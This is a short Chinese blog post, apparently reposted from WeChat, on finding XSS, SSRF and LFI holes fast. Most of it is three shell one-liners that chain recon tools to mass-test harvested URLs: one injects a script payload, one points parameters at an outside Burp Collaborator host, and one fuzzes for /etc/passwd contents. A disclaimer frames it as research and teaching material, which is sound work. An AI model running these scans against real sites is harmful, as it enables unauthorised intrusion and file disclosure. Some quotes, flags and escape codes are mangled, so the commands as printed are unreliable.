声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
文章首发于个人博客:https://mybeibei.net,点击最下方“阅读原文”可直接跳转查看。
背景介绍
本文将告诉你如何使用 gf、httpx、waybackurls、qsreplace、gau 工具快速找到 SSRF、XSS 和 LFI 漏洞。废话不多说,开始!
XSS
首先将使用 gf、httpx、waybackurls、qsreplace这些工具来寻找XSS漏洞,命令如下:
cat file.txt| gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ |while read host do;do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done
generic
224 Bytes
© Guge's Blog
以上命令可以在指定目标域中发现XSS漏洞。
SSRF
命令:
findomain -t example.com -q | httpx -silent -threads 1000| gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net
generic
119 Bytes
© Guge's Blog
上述命令将过滤 SSRF 的参数,并将请求发送给到burpcollaborator。
LFI
命令:
findomain -t example.com -q | waybackurls |gf lfi | qsreplace FUZZ |while read url ;do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt; done
generic
143 Bytes
© Guge's Blog
你学废了么?
感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~
====正文结束====
原文始发于微信公众号(骨哥说事):使用工具快速发现 SSRF、LFI、XSS
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论